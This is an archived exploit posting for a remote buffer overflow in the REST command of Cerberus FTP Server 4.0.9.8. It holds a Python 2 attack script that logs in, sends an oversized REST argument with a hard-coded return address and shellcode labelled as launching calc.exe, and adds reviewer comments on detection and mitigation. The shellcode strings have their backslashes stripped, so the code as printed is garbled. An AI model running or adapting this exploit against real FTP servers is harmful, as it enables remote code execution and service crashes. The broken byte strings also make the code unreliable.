Cerberus FTP Server 4.0.9.8 Buffer Overflow
Posted on 03 September 2011
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / \__ /'__` 0
0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0
0 / / / / \__/ \_ \_ / 1
1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0
0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
1 \____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : windows
# Impact : Remote Buffer Overflow ( in REST command)
# Tested on : Windows XP SP3 (en)
##
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
# | ------------------------------------------------- < |
###
#=====[ Exploit Code ]======>
#!/usr/bin/python
# Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Provided by : KedAns-Dz * Inj3ct0r Team
#
# NOTE(review): what this listing shows, read from the code below.
#   - Python 2 script (print statements); takes <ip> <port> on the command line.
#   - Opens an FTP control connection, sends USER and PASS with the hard-coded
#     account "test"/"test", then sends one REST command carrying an oversized
#     argument. The login comes first, which suggests the affected code path is
#     only reached after authentication - TODO confirm against the vendor advisory.
#   - The REST argument is 244 filler characters, a 4-byte little-endian value,
#     50 padding characters, and a payload the author labels as
#     "windows/exec cmd=calc.exe" (a proof-of-concept that launches the calculator).
#   - String literals are reproduced exactly as archived on this page.
#
# NOTE(review): defensive reading.
#   - Detection: in normal FTP use the REST argument is a short restart marker
#     (a decimal byte offset in stream mode). A REST argument that is hundreds of
#     bytes long or contains non-digit characters is not normal client behaviour;
#     it is a reasonable signature for FTP-aware IDS/proxy rules and for review of
#     server command logs. A service crash or restart shortly after such a command
#     is a host-side indicator.
#   - Mitigation: upgrade to a vendor release that corrects REST argument handling
#     (fixed version not stated on this page: <FIXED_VERSION>), remove test/default
#     accounts, and limit which networks can reach the FTP control port.
#   - The hard-coded return address is specific to one kernel32.dll build (the
#     author tested on Windows XP SP3 en); on hosts with ASLR and DEP a fixed
#     address like this is unlikely to give code execution, though the overflow
#     may still crash the service.
import errno  # NOTE(review): imported but never referenced in this listing
from os import strerror  # NOTE(review): imported but never referenced in this listing
from socket import *
import sys
from time import sleep
from struct import pack

# Require exactly two arguments (target address and port); otherwise print usage.
# Note the usage path exits with status 0, so callers cannot tell it from success.
if len(sys.argv) != 3:
    print "[*]Usage: python %s <ip> <port>" % sys.argv[0]
    print "[*]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
    sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])  # raises ValueError on a non-numeric port; not handled

# Payload as labelled by the author (generator name and options are the author's):
# windows/exec | cmd=calc.exe | x86/alpha_mixed (http://metasploit.com)
shellcode = ("x56x54x58x36x33x30x56x58x48x34x39x48x48x48"
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41"
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58"
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30"
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41"
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42"
"x42x41x42x58x50x38x41x42x75x4ax49x49x6cx4b"
"x58x4ex69x43x30x43x30x43x30x43x50x4fx79x4b"
"x55x45x61x4ex32x43x54x4cx4bx42x72x50x30x4c"
"x4bx42x72x44x4cx4ex6bx43x62x42x34x4cx4bx43"
"x42x45x78x46x6fx4dx67x51x5ax51x36x50x31x49"
"x6fx50x31x4bx70x4cx6cx45x6cx43x51x51x6cx47"
"x72x46x4cx51x30x49x51x4ax6fx46x6dx47x71x4a"
"x67x4ax42x4ax50x46x32x51x47x4cx4bx43x62x44"
"x50x4ex6bx42x62x45x6cx47x71x4ex30x4cx4bx47"
"x30x50x78x4ex65x49x50x50x74x51x5ax46x61x4e"
"x30x50x50x4cx4bx51x58x45x48x4ex6bx43x68x45"
"x70x47x71x4bx63x4ax43x45x6cx47x39x4cx4bx47"
"x44x4cx4bx46x61x48x56x50x31x49x6fx46x51x4f"
"x30x4ex4cx4bx71x4ax6fx44x4dx47x71x4ax67x44"
"x78x49x70x44x35x48x74x45x53x51x6dx4ax58x45"
"x6bx51x6dx44x64x44x35x48x62x51x48x4ex6bx51"
"x48x47x54x43x31x4bx63x43x56x4ex6bx46x6cx42"
"x6bx4cx4bx43x68x47x6cx46x61x4ax73x4ex6bx43"
"x34x4ex6bx47x71x48x50x4cx49x51x54x51x34x45"
"x74x43x6bx43x6bx50x61x46x39x51x4ax42x71x4b"
"x4fx4dx30x50x58x51x4fx50x5ax4ex6bx46x72x4a"
"x4bx4bx36x43x6dx51x7ax46x61x4ex6dx4fx75x4d"
"x69x43x30x47x70x45x50x50x50x42x48x44x71x4c"
"x4bx50x6fx4bx37x4bx4fx4ax75x4fx4bx4ax50x4d"
"x65x4ex42x42x76x50x68x4ex46x4ex75x4fx4dx4d"
"x4dx4bx4fx4ex35x47x4cx44x46x51x6cx44x4ax4d"
"x50x49x6bx49x70x42x55x46x65x4fx4bx47x37x45"
"x43x51x62x50x6fx42x4ax47x70x50x53x49x6fx49"
"x45x50x63x51x71x42x4cx42x43x46x4ex50x65x51"
"x68x43x55x45x50x41x41")

# Filler ahead of the 4-byte value below; presumably the distance to the saved
# return address in the vulnerable REST handler - not verifiable from this page.
buf = "x41" * 244
buf += pack('<L',0x7C874413) # jmp esp - from (kernel32.dll)
buf += "x90" * 50  # padding placed between the address and the payload
buf += shellcode
print "[+]Connecting with server..."
sleep(1)
try:
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))
    # Every recv() result is discarded: server replies (banner, login result)
    # are never checked, so a rejected login is not noticed by the script.
    s.recv(1024)
    s.send("USER test ")
    s.recv(1024)
    s.send("PASS test ")
    s.recv(1024)
    # The single request of interest to defenders: REST with the oversized argument.
    s.send("REST "+buf+" ")
    s.close()
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))# Connected again to Crash and BOF
    sleep(1)
    s.close()# Close connection and Crash!!!
    # Printed whenever the calls above did not raise; it says nothing about
    # whether the target was actually affected.
    print "[+]Exploit sent with sucess"
except:
    # Bare except: any failure in the block above is reported as a connection error.
    print "[-]Error in connection with server: "+ip
#=====[ The End ]=======|
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================
